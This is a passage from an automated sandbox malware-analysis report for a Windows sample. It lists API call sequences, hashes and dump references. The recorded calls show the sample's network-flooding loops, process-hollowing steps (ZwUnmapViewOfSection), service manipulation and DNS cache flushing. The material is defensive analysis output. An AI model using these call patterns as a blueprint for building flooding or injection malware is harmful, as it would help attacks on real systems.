        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000002,00000011), ref: 00403770
      • connect.WS2_32(00000000,?,00000010), ref: 0040377C
      • setsockopt.WS2_32 ref: 0040379C
        • Part of subcall function 004011A0: GetTickCount.KERNEL32 ref: 004011B3
        • Part of subcall function 004011A0: srand.MSVCRT ref: 004011BA
        • Part of subcall function 004011A0: rand.MSVCRT ref: 004011C3
      • send.WS2_32(00000000,?,00000000,00000000), ref: 004037E1
      • Sleep.KERNEL32(?), ref: 004037FC
      • closesocket.WS2_32(00000000), ref: 0040380C
      • Sleep.KERNEL32(?), ref: 00403818
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleep$CountTickclosesocketconnectgethostbynamehtonsinet_addrrandsendsetsockoptsocketsrand
      • String ID:
      • API String ID: 526411511-0
      • Opcode ID: 444a2075ad8941576596289908408714f768e301d8c063e47ccbfb94edac868b
      • Instruction ID: 392376a69a85ddd6a41fefe85f27db82272ddffc380eaf5d6d57f244aef9ba4d
      • Opcode Fuzzy Hash: 444a2075ad8941576596289908408714f768e301d8c063e47ccbfb94edac868b
      • Instruction Fuzzy Hash: 7D31C8B17403416BE7009B65DD46FAB77E8EB88700F00843DF645EB3D1E6B8D9148B6A
      APIs
      • htons.WS2_32 ref: 00403BC7
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000006), ref: 00403C06
      • connect.WS2_32(00000000,?,00000010), ref: 00403C16
      • closesocket.WS2_32(00000000), ref: 00403C22
      • send.WS2_32(00000000,?,00000000), ref: 00403C6A
      • Sleep.KERNEL32(?,?,00000000), ref: 00403C77
      • closesocket.WS2_32(00000000), ref: 00403C80
      • Sleep.KERNEL32(?,?,00000000), ref: 00403C8D
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleepclosesocket$connectgethostbynamehtonsinet_addrsendsocket
      • String ID:
      • API String ID: 1592164743-0
      • Opcode ID: 6338840cde0a2a7df0f9744fb7fc18c33f45636636b2eddbddb7982ae8ac7723
      • Instruction ID: 54006a430e523e054915d6eeed30a28e789cf4b120cc542b5afca5d7f0e37e33
      • Opcode Fuzzy Hash: 6338840cde0a2a7df0f9744fb7fc18c33f45636636b2eddbddb7982ae8ac7723
      • Instruction Fuzzy Hash: C92128716043006BE3009F25ED41B6B77E8EB88710F004939F655FB2E2D679DA50CB9D
      APIs
      • htons.WS2_32 ref: 00404608
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000006), ref: 0040463F
      • connect.WS2_32(00000000,?,00000010), ref: 0040464F
      • send.WS2_32(00000000,00408A7C,00000000,00000000), ref: 0040466A
      • Sleep.KERNEL32(?), ref: 00404678
      • closesocket.WS2_32(00000000), ref: 00404681
      • Sleep.KERNEL32(0000001E), ref: 00404689
      • closesocket.WS2_32(00000000), ref: 004046A1
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleepclosesocket$connectgethostbynamehtonsinet_addrsendsocket
      • String ID:
      • API String ID: 1592164743-0
      • Opcode ID: 5eebb4bd4fb58d615f5178da3257558304f254ebf4d24a63fe7bd5c24358b5b7
      • Instruction ID: 52552667529c1c02b845fd8a5a2af135eee2e5d9a0b5595cc109e900984e1983
      • Opcode Fuzzy Hash: 5eebb4bd4fb58d615f5178da3257558304f254ebf4d24a63fe7bd5c24358b5b7
      • Instruction Fuzzy Hash: EB21C9712003005BE300DF79AD45B6B77D8EF85320F00493AF655E62E2E779D9558BAD
      APIs
      • htons.WS2_32(?), ref: 004035FB
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000002,00000011), ref: 00403634
      • setsockopt.WS2_32 ref: 00403652
        • Part of subcall function 004011A0: GetTickCount.KERNEL32 ref: 004011B3
        • Part of subcall function 004011A0: srand.MSVCRT ref: 004011BA
        • Part of subcall function 004011A0: rand.MSVCRT ref: 004011C3
      • sendto.WS2_32(00000000,?,00000000,00000000,?,00000010), ref: 004036A1
      • Sleep.KERNEL32(?), ref: 004036BC
      • closesocket.WS2_32(00000000), ref: 004036CC
      • Sleep.KERNEL32(?), ref: 004036D8
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleep$CountTickclosesocketgethostbynamehtonsinet_addrrandsendtosetsockoptsocketsrand
      • String ID:
      • API String ID: 1041160085-0
      • Opcode ID: 8a1cc530a81bfc68c490b0e3cc263bfa586558bb8acf8600ee6311d4aa21e5e8
      • Instruction ID: 989c941252648da03f0e755ab53e95e2a6e75eaf6f0a8efd28d51292b3b26e67
      • Opcode Fuzzy Hash: 8a1cc530a81bfc68c490b0e3cc263bfa586558bb8acf8600ee6311d4aa21e5e8
      • Instruction Fuzzy Hash: E131D6717003417BE710DB65DD45BAB76D8EB88700F00883DB685EB3D1E6B989108B5E
      APIs
      • LoadLibraryA.KERNEL32(Shell32.dll), ref: 00401646
      • GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 00401654
      • FreeLibrary.KERNEL32(00000000), ref: 0040166F
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Library$AddressFreeLoadProc
      • String ID: Shell32.dll$ShellExecuteA$open
      • API String ID: 145871493-1242875128
      • Opcode ID: 2e57850eee62508e1949f66f631c0d0079fe20c14937c4a69f495ebaaf87453f
      • Instruction ID: 18a04fa1837e6b3da508e0e8e43fba5aac3cedb90d2bc1d2a056c299085bb5dc
      • Opcode Fuzzy Hash: 2e57850eee62508e1949f66f631c0d0079fe20c14937c4a69f495ebaaf87453f
      • Instruction Fuzzy Hash: F2D05E306C9310BBE1207F50AD0EFAF2A54DB46B01F120021FA02792D0D6B8280085BE
      APIs
      • CreateFileA.KERNEL32 ref: 00405297
      • GetFileSize.KERNEL32(00000000,00000000,?,00000000), ref: 004052AE
      • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 004052B7
      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?), ref: 004052E2
      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00405304
      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?), ref: 0040530B
        • Part of subcall function 00405330: VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405399
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: File$??2@??3@CloseCreateFreeHandleReadSizeVirtual
      • String ID:
      • API String ID: 3988611374-0
      • Opcode ID: a2863e5673767d964cdede91afb04663b137781032fa7f0b81609b3cc9fc33b2
      • Instruction ID: 221b0b0a4cabf3d12b7df73f085c741e3f61b684f79064255cb0f96ed6264dd2
      • Opcode Fuzzy Hash: a2863e5673767d964cdede91afb04663b137781032fa7f0b81609b3cc9fc33b2
      • Instruction Fuzzy Hash: 111104712546046FE210AB24AC09F3B36DDEBC4764F00073DFE0AA73C0DAB5AD188679
      APIs
      • htons.WS2_32 ref: 004046E4
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000002,00000011), ref: 0040471F
      • sendto.WS2_32(00000000,00408A7C,00000000,00000000,?,00000010), ref: 00404741
      • Sleep.KERNEL32(?), ref: 0040474A
      • closesocket.WS2_32(00000000), ref: 00404750
      • Sleep.KERNEL32(0000001E), ref: 00404758
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleep$closesocketgethostbynamehtonsinet_addrsendtosocket
      • String ID:
      • API String ID: 1054369574-0
      • Opcode ID: 45a6ffd880468f70a481824dd6e3fd1755ad39f1b29a83d52c11540c06d7a3de
      • Instruction ID: bc9cb3a44a504bb613548d5f4e1e64a46e4bff955eaf8bddd84f51c244c6a70d
      • Opcode Fuzzy Hash: 45a6ffd880468f70a481824dd6e3fd1755ad39f1b29a83d52c11540c06d7a3de
      • Instruction Fuzzy Hash: 5D1160716403016BD700EB79AD45F5B77E4EB88710F40883AF645E72A2E774D814CB5D
      APIs
      • htons.WS2_32 ref: 00403CE4
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000006), ref: 00403D25
      • connect.WS2_32(00000000,?,00000010), ref: 00403D31
      • Sleep.KERNEL32(000001F4), ref: 00403D38
      • closesocket.WS2_32(00000000), ref: 00403D3B
      • Sleep.KERNEL32(?), ref: 00403D47
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleep$closesocketconnectgethostbynamehtonsinet_addrsocket
      • String ID:
      • API String ID: 1787185183-0
      • Opcode ID: 8443317f9dafa97f2392e42f6ccd6fe3450fc2502a4ce46ff6279e13bcdf6a75
      • Instruction ID: c9b9b10d26a8ac24fc8dc46de84298ce88c3985539e8605e2d809d9f5261d823
      • Opcode Fuzzy Hash: 8443317f9dafa97f2392e42f6ccd6fe3450fc2502a4ce46ff6279e13bcdf6a75
      • Instruction Fuzzy Hash: 6511A0716003016BD700EF69DD41B57B7E8EF88710F00883AF545E7262E6B5D9508B6A
      APIs
      • htons.WS2_32 ref: 00403D9B
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000006), ref: 00403DDB
      • connect.WS2_32(00000000,?,00000010), ref: 00403DE7
      • Sleep.KERNEL32(00000014), ref: 00403DEB
      • Sleep.KERNEL32(00000064), ref: 00403E06
      • closesocket.WS2_32(?), ref: 00403E1C
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleep$closesocketconnectgethostbynamehtonsinet_addrsocket
      • String ID:
      • API String ID: 1787185183-0
      • Opcode ID: edaa330fa2de0a39da5f169561d2b5b36f7fbbd957c4864943f194fb66e7a353
      • Instruction ID: db46a9e34c16731a9cca81507a1d94d98400597ef13b238ba8d557dd9881dec4
      • Opcode Fuzzy Hash: edaa330fa2de0a39da5f169561d2b5b36f7fbbd957c4864943f194fb66e7a353
      • Instruction Fuzzy Hash: 26115B716043419BDB00DF25DD41A5BBBE8AF88704F01092EF585AB291E7B4EA148F9A
      APIs
      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00401B79
      • GetFileSize.KERNEL32(00000000,00000000), ref: 00401B88
      • ??2@YAPAXI@Z.MSVCRT(?,?,00000000), ref: 00401BA2
      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00401BB8
      • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00401BBF
      • CloseHandle.KERNEL32(00000000), ref: 00401BCC
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: File$CloseHandle$??2@CreateReadSize
      • String ID:
      • API String ID: 2748938236-0
      • Opcode ID: 4316fb04cc77c188b8bcfcaf8f7a8b0344f28b857231df91b7da86c1ee61b739
      • Instruction ID: a0a192e2a767c00397ca819df4e1f58d6aa4c41ca3a1c50c818334c52765ceb6
      • Opcode Fuzzy Hash: 4316fb04cc77c188b8bcfcaf8f7a8b0344f28b857231df91b7da86c1ee61b739
      • Instruction Fuzzy Hash: 7F018171241210BFE320DF249E49F5B36E8EB85B11F110429F705F62C0D774A81586BA
      APIs
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 00402109
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 00402116
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 00402132
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 0040213F
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 0040215B
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 00402168
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: ServiceStatus
      • String ID:
      • API String ID: 3969395364-0
      • Opcode ID: d1bb2b1bfeb0d321b9b3f541c97aa4a9f6a4e00448e8af0a347742c95850724a
      • Instruction ID: 79b47afaa4391bb2004c4c7ac8aae8e92e9b7ad006814b7af97adc9c59869305
      • Opcode Fuzzy Hash: d1bb2b1bfeb0d321b9b3f541c97aa4a9f6a4e00448e8af0a347742c95850724a
      • Instruction Fuzzy Hash: 86F0FFB2A40159B6CA00EB98BE54F4276B8B7987207118033B204B32E2C5F8BC00CF6C
      APIs
      • CreateProcessA.KERNEL32 ref: 00404F95
      • GetThreadContext.KERNEL32(?,?,?,00000000), ref: 00404FDF
      • ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?), ref: 00405001
      • VirtualQueryEx.KERNEL32(?,?,00000000,0000001C), ref: 00405014
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Process$ContextCreateMemoryQueryReadThreadVirtual
      • String ID: D
      • API String ID: 2027120601-2746444292
      • Opcode ID: 3b33d69417f1d5ca419a7b7ada1efc61d5852d100ab3cf01482c54b42626c896
      • Instruction ID: ff5d6133ced2bfcf86262151f3cbec8a07388085264d046bedd301de37389764
      • Opcode Fuzzy Hash: 3b33d69417f1d5ca419a7b7ada1efc61d5852d100ab3cf01482c54b42626c896
      • Instruction Fuzzy Hash: D531F2B5604345AFE314CF58C844E6BB7E8FB89301F10892EFA8997251D770A8058BA2
      APIs
      • LoadLibraryA.KERNEL32(ntdll.dll,?,?,004050FA,?,?,00000000,00000000,00000000), ref: 00404F09
      • GetProcAddress.KERNEL32(00000000,ZwUnmapViewOfSection), ref: 00404F1B
      • FreeLibrary.KERNEL32(00000000), ref: 00404F39
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Library$AddressFreeLoadProc
      • String ID: ZwUnmapViewOfSection$ntdll.dll
      • API String ID: 145871493-452462277
      • Opcode ID: 095f4013b149cb31a46cb3d580cba13eb7930af1090732e97939419024d14a92
      • Instruction ID: efc8a783f345efe3de7d969348ce7e2f5f5aa606f921517c0f9cd98c218141f8
      • Opcode Fuzzy Hash: 095f4013b149cb31a46cb3d580cba13eb7930af1090732e97939419024d14a92
      • Instruction Fuzzy Hash: 11E0927620022157C220A7249D08E2B66A59BC1F513024139F942F3280CA38880682A9
      APIs
      • LoadLibraryA.KERNEL32(dnsapi.dll), ref: 00401006
      • GetProcAddress.KERNEL32(00000000,DnsFlushResolverCache), ref: 00401018
      • FreeLibrary.KERNEL32(00000000), ref: 00401025
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Library$AddressFreeLoadProc
      • String ID: DnsFlushResolverCache$dnsapi.dll
      • API String ID: 145871493-2397261594
      • Opcode ID: d501a4e58af21f11d6eed54cc70368c9c95fc04e874483feec0f3d3114b002d3
      • Instruction ID: 6eb7416c84d66eeeb6002940983d616efea6aab674776c4e38c4d1c4f80a77ff
      • Opcode Fuzzy Hash: d501a4e58af21f11d6eed54cc70368c9c95fc04e874483feec0f3d3114b002d3
      • Instruction Fuzzy Hash: 12D0A9319829219BC2313B202D08BDF2A949E46B403020132F802F12E0CB3C889180AE
      APIs
      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 004022CA
      • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 004022E3
      • DeleteService.ADVAPI32(00000000), ref: 004022F6
      • CloseServiceHandle.ADVAPI32(00000000), ref: 004022FD
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00402300
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Service$CloseHandleOpen$DeleteManager
      • String ID:
      • API String ID: 204194956-0
      • Opcode ID: 116d1e0ec0a4b372d694c8a67d0e82791e6de5e32c851d8c30bee83f41f85077
      • Instruction ID: 9b0c48f28204a619d0ffdb4144fcbd549302fdad28ef3037a9a57e52c33c53b6
      • Opcode Fuzzy Hash: 116d1e0ec0a4b372d694c8a67d0e82791e6de5e32c851d8c30bee83f41f85077
      • Instruction Fuzzy Hash: 91E0D8362826227BE2129328AD88F7F762CEF85B91F010125FB0576288CE748C019679
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: printf
      • String ID: relo type %d found at .%X$No fixups!
      • API String ID: 3524737521-288157267
